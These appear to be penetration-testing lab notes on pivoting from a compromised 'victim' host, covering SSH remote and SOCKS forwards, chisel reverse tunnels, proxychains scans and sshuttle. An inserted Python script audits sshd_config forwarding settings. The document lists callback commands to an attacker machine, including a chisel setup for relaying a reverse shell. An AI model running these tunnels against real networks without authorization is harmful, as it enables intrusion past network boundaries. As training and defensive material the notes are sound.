In this case, we will ssh out to our Kali machine as the kali user ([email protected]), specify no commands (-N), and a remote forward (-R). We will open a listener on TCP port 2221 on our Kali machine (10.11.0.4:2221) and forward connections to the internal Linux machine’s TCP port 3306 (127.0.0.1:5555):
# On victim
ssh -N -R 192.168.119.145:2221:127.0.0.1:5555 [email protected]
sudo ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -N -R 192.168.145.52:2221:127.0.0.1:5555 [email protected]
127.0.0.1:80 [email protected] -p2222
ssh -N -R 192.168.119.145:5555:127.0.0.1:5555 [email protected]
Chisel
Expose one or more known ports from the victim to the attack machine
# on kali
chisel server -p 5000 -reverse
# on victim
chisel client <IP_ATTACK>:5000 R:<IP>:<PORT_TO_EXPOSE>:127.0.0.1:<FREE_PORT_ON_ATTACKER_MACHINE>
Forward connections from the internal network back to the attacker machine (e.g. a reverse shell from an internal host through the proxy to the attacker machine, or allowing file uploads through an HTTP server on the attacker machine)
# on kali
chisel server -p 5000
# on victim
chisel client <IP_ATTACK>:5000 <REV_SHELL_PORT>:<IP_ATTACK>:<LISTENING_PORT_ON_ATTACKER>
Tunnel all traffic to any host in the target network through the compromised Linux machine, which we log into as student
# on attack
chisel server -p 5000 --socks5 --reverse
# In /etc/proxychains.conf on attack
socks5 127.0.0.1 <PROXY_PORT>
# On victim
chisel client <IP_ATTACK>:5000 R:<PROXY_PORT>:socks
# We can then run commands like
proxychains -q nmap -sT IP
Socks proxy to enable access to internal machines/ports
sudo ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -N -D 127.0.0.1:80 [email protected]
# cat /etc/proxychains.conf
socks5 127.0.0.1 8080
Then in Kali we can run commands like
sudo proxychains nmap --top-ports=20 -sT -Pn 192.168.1.110
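Both the `-R` forwards above and the `-D` SOCKS proxy depend on the sshd configuration of the machine that accepts the SSH session: `AllowTcpForwarding` must be on for any of them, and binding a `-R` listener to a non-loopback address such as 192.168.119.145:2221 additionally needs `GatewayPorts`. The following audit script is an added example, not part of the original notes; it parses an sshd_config and reports which forwarding directives are left enabled (by explicit value or by OpenSSH default), and the sample config it checks is constructed.

```python
"""Audit an sshd_config for the forwarding directives that SSH pivots rely on.

Only the global section (before the first Match block) is evaluated; Match
blocks apply conditionally and should be reviewed by hand.
"""
import re

# OpenSSH defaults from sshd_config(5) for the global section.
DEFAULTS = {
    "allowtcpforwarding": "yes",          # -L / -R / -D need this
    "gatewayports": "no",                 # -R bound to a non-loopback address needs this
    "permittunnel": "no",                 # -w tun device forwarding
    "allowstreamlocalforwarding": "yes",  # unix-socket forwarding
}
# Values that leave the feature (at least partly) enabled.
ENABLED = {
    "allowtcpforwarding": {"yes", "all", "local", "remote"},
    "gatewayports": {"yes", "clientspecified"},
    "permittunnel": {"yes", "point-to-point", "ethernet"},
    "allowstreamlocalforwarding": {"yes", "all", "local", "remote"},
}
DIRECTIVE = re.compile(r"^([A-Za-z]+)(?:\s*=\s*|\s+)(\S+)")


def effective_settings(config_text):
    """Effective global value of each forwarding directive (first value wins, as in sshd)."""
    settings = dict(DEFAULTS)
    seen = set()
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and surrounding whitespace
        m = DIRECTIVE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).lower()
        if key == "match":                    # conditional section starts: stop here
            break
        if key in settings and key not in seen:
            settings[key] = value
            seen.add(key)
    return settings


def findings(config_text):
    """Sorted names of directives whose effective value leaves forwarding enabled."""
    eff = effective_settings(config_text)
    return sorted(k for k, v in eff.items() if v in ENABLED[k])


# Constructed sample: GatewayPorts is on and AllowTcpForwarding keeps its default of yes,
# because the "no" only lives in a Match block.
SAMPLE = "Port 22\nGatewayPorts yes\nPermitTunnel no\nMatch User kali\n  AllowTcpForwarding no\n"
```

Run `findings(open("/etc/ssh/sshd_config").read())` on a host to see which of the four directives would still let a logged-in account build these tunnels.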
sshuttle
Go through 10.11.1.251 to reach network 10.3.3.0
sshuttle -r [email protected] 10.3.3.0/24